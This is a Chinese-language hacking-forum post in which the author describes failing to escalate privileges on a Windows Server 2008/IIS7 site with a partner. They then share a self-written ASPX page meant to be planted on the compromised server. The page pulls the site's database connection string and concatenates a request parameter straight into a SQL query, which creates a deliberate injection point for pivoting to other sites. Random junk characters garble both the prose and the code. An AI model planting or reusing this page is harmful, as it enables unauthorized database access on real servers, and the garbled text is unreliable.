昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
5 h4 U' w) e. |: E其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
% ~+ f$ g0 u4 Q& ?/ H5 ^7 K代码量不多,自己写个拉倒了。烦死了。
6 {5 b- M- ?- U* r' M! R) Q3 E
' G$ i h2 z& o, E% E: c1 w
/ b, w/ D) {6 Y: u8 g+ X9 Z<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">& B' x# x* E1 X7 G3 m
<html xmlns="http://www.w3.org/1999/xhtml">+ r* C: q1 m8 K& N
<head runat="server">1 n' z# y; Y' Y& N* R! p" v
<title>暗影aspx构造注射专用页面</title>
8 O/ g, `# V1 W</head>* M6 Q5 x& _3 o$ D
<body>
& C$ v+ d" B7 c3 ? <form id="form1" runat="server">; G& x \ o3 c4 \! @0 d& C
<div># @+ R+ C6 U6 H1 m6 v
<script language="c#" runat="server">
' W- z, M* H6 J + h; J! F8 ]7 y. m& X) Q" n
void page_init(object sender, EventArgs e)
1 Y- o* X/ M' ~7 b" E X# } {6 p4 h1 c3 O2 a" \! [/ G* m
9 r- J1 @1 s! m System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();, u3 e" b! b( F. p/ j
, y* I# y3 i# T! g2 Z' y
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();" m: T- z7 D) }* i H: F
conn.Open();( a) B% g1 @/ x8 K: M
& ~" @3 d9 F( g% k* C+ b) Y: t
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
/ P2 P/ C- E: O6 m
9 L) x" L* `' \& g D System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
8 e/ q) p z# B int x = command.ExecuteNonQuery();
4 s) b% O, \. O! Q. ` Response.Write(i+"\n");
7 l# G/ _ h& R! Y3 h! N6 J8 X# b Response.Write(x);+ }9 T( M' L% m: N
conn.Close();/ G9 {6 D& r1 d I' _
}
, D2 U0 C* M4 D3 K2 o 8 o* m+ `% N( q* w! a* b- ~
</script>* C4 {2 [0 D! b) }- I4 c& f
</div>' w" p0 n/ C( @0 j; U
</form>. \" z9 p" N1 V R0 {
</body>
- V; c7 M7 O- p! p3 _( q</html>! t0 M. {. ]. W8 i1 v( R
|